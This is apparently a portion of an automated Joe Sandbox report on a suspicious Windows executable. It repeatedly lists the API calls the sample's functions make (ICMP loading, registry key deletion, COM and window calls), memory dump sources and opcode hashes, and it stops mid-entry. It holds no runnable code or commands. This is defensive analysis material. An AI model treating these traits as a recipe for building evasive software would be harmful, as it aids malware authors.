                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                          • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                          • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                          • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                          APIs
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                          • String ID: crts
                                          • API String ID: 943502515-3724388283
                                          • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                          • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                          • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                          • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                          APIs
                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                          • CoUninitialize.OLE32 ref: 0046E53D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                          • String ID: .lnk
                                          • API String ID: 886957087-24824748
                                          • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                          • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                                          • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                          • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                          • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                          • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorMode$LabelVolume
                                          • String ID: \VH
                                          • API String ID: 2006950084-234962358
                                          • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                          • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                          • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                          • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                          APIs
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • GetMenuItemInfoW.USER32 ref: 00449727
                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                          • DrawMenuBar.USER32 ref: 00449761
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Menu$InfoItem$Draw_malloc
                                          • String ID: 0
                                          • API String ID: 772068139-4108050209
                                          • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                          • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                          • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                          • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcslen$_wcscpy
                                          • String ID: 3, 3, 8, 1
                                          • API String ID: 3469035223-357260408
                                          • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                          • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                          • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                          • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                          APIs
                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: ICMP.DLL$IcmpCloseHandle
                                          • API String ID: 2574300362-3530519716
                                          • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                          • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                          • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                          • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                          APIs
                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: ICMP.DLL$IcmpCreateFile
                                          • API String ID: 2574300362-275556492
                                          • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                          • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                          • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                          • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                          APIs
                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: ICMP.DLL$IcmpSendEcho
                                          • API String ID: 2574300362-58917771
                                          • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                          • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                          • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                          • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                          • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                          • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                          • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                          • API String ID: 2574300362-1816364905
                                          • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                          • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                          • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                          • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                          • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                          • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                          • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0047950F
                                          • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                          • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                          • VariantClear.OLEAUT32(?), ref: 00479650
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                          • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                          • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                          • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                          APIs
                                          • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                          • __itow.LIBCMT ref: 004699CD
                                            • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                          • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                          • __itow.LIBCMT ref: 00469A97
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow
                                          • String ID:
                                          • API String ID: 3379773720-0
                                          • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                          • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                          • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                          • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00449A4A
                                          • ScreenToClient.USER32(?,?), ref: 00449A80
                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                          • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                          • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                          • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                          • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                          • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                          • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                          APIs
                                          • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                          • GetWindowRect.USER32(?,?), ref: 00441722
                                          • PtInRect.USER32(?,?,?), ref: 00441734
                                          • MessageBeep.USER32(00000000), ref: 004417AD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
